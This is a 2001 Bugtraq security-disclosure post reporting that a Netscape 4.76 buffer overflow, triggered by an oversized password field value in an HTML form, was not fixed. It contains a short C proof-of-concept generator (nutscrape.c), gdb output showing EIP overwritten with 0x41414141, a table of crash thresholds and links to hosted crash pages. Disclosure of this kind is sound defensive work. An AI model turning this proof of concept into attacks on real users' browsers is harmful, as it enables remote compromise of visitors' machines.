[18637] in bugtraq
Buffer Overflow still exists in Netscape <= 4.76
daemon@ATHENA.MIT.EDU (fish stiqz)
Tue Jan 16 13:13:44 2001
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Message-ID: <20010116001943.A24465@analog.org>
Date: Tue, 16 Jan 2001 00:19:43 -0500
Reply-To: fish stiqz <fish@ANALOG.ORG>
From: fish stiqz <fish@ANALOG.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
Hello.
I have noticed that the buffer overflow discovered by Michal Zalewski
and covered extensively by the different unix distributions is still
present in netscape 4.76 even though they claim it is not.
Refer to these links for background information:
http://security-archive.merton.ox.ac.uk/bugtraq-200011/0099.html
http://security-archive.merton.ox.ac.uk/bugtraq-200011/0426.html
http://www.redhat.com/support/errata/RHSA-2000-109.html
All of the above advisories (and all that I've seen) state that netscape
versions up to and including 4.75 are vulnerable, not 4.76. I have
caused netscape 4.76 on both redhat 6.2 and slackware-current to segfault.
Below is the proof of the pudding:
On slackware-current (netscape.tgz):
$ ./nutscrape 20000 > crash_me.html
$ netscape -v
Netscape 4.76/U.S., 06-Oct-00; (c) 1995-2000 Netscape Communications Corp.
$ gdb /usr/bin/netscape
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-slackware-linux"...
(no debugging symbols found)...
(gdb) set args http://fish.analog.org/~fish/crash_me.html
(gdb) run
Starting program: /usr/bin/netscape
http://fish.analog.org/~fish/crash_me.html
warning: Unable to find dynamic linker breakpoint function.
GDB will be unable to debug shared library initializers
and track explicitly loaded dynamic code.
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info all-registers
eax 0x41414141 1094795585
ecx 0xbfffd904 -1073751804
edx 0x91c1c00 152837120
ebx 0x175a2c 1530412
esp 0xbfffd83c 0xbfffd83c
ebp 0xbfffd864 0xbfffd864
esi 0x0 0
edi 0x921eb8c 153217932
eip 0x41414141 0x41414141
eflags 0x10246 66118
<snip>
On Redhat 6.2 (netscape-communicator-4.76-0.6.2.i386.rpm):
$ cat /etc/redhat-release
Red Hat Linux release 6.2 (Zoot)
$ netscape -v
Netscape 4.76/U.S., 06-Oct-00; (c) 1995-2000 Netscape Communications Corp.
$ rpm -qa |grep netscape
netscape-communicator-4.76-0.6.2
netscape-common-4.76-0.6.2
$ gdb /usr/lib/netscape/netscape-communicator
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(no debugging symbols found)...
(gdb) run http://fish.analog.org/~fish/crash_me.html
Starting program: /usr/lib/netscape/netscape-communicator
http://fish.analog.org/~fish/crash_me.html
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()Cannot access memory at address 0x7f0000
(gdb) info all-registers
eax 0x41414141 1094795585
ecx 0xbfffdd14 -1073750764
edx 0x9268200 153518592
ebx 0x40064a2c 1074154028
esp 0xbfffdc4c -1073750964
ebp 0xbfffdc74 -1073750924
esi 0x0 0
edi 0x92624ec 153494764
eip 0x41414141 1094795585
eflags 0x10246 66118
<snip>
So we see here that out eip is now 0x41414141. This is obviously bad.
Windows versions seem to not be vulnerable, although I have only tested
this on versions 4.08 and 4.61.
If this vulnerability is exploited, an attacker could gain entrance to
potentially any computer running vulnerable versions of netscape that
visits his website. To test if you are vulnerable, point your browser to
http://fish.analog.org/~fish/crash_netscape.html (15,000 A's) or
http://fish.analog.org/~fish/crash_netscape2.html (100,000 A's)
My Findings: (you may have to hit reload before the browser will crash):
Number of A's | Result
-------------------------------------------------------
1000 Nothing.
2000 Nothing.
5000 Memory corruption (check view source and you may see this)
7000 Continued corruption.
10000 SIGSEGV in PR_HashTableRawLookup ()
15000 SIGSEGV in _MD_GetArchitecture ()
>= 20000 SIGSEGV in XFE_GetFormElementInfo ()
And, sometimes eip overwrite.
-------------------------------------------------------
nutscrape.c is a very trivial program that generates a big html form
value in an input field, which causes the overflow.
/*
* nutscrape.c - fish stiqz <fish@analog.org>
* Trivial overflow in netscape.
*/
#include <stdio.h>
#include <stdlib.h>
#define OVERFLOW_BYTE 0x41
void usage(char *p)
{
fprintf(stderr, "usage: %s <num of %c's>\n", p, OVERFLOW_BYTE);
exit(EXIT_FAILURE);
}
int main(int argc, char **argv)
{
int i, t;
if(argc != 2)
usage(argv[0]);
t = atoi(argv[1]);
printf("<html>\n\n<head>\n<title>Test of Netscape</title>\n"
"</head>\n\n<body>\n\n\n<form action=foo method=bar>\n"
"<input type=password value=");
for(i = 0; i < t; i++)
putc(OVERFLOW_BYTE, stdout);
printf(">\nmore form tags\n</form>\n\n\n</body>\n</html>\n");
return EXIT_SUCCESS;
}
So, in summary, If you upgraded to netscape 4.76 to fix the buffer
overflow problem, then you upgraded in vain, the problem most
definitely still exists.
Hope you all have a good day.
- fish stiqz
shoutouts to nerile.
#TelcoNinjas suck.
--
+---------------------------------------------------------------------------+
| fish stiqz <fish@analog.org> <*)))-< ** yum, yum, delicious ** |
+---------------------------------------------------------------------------+
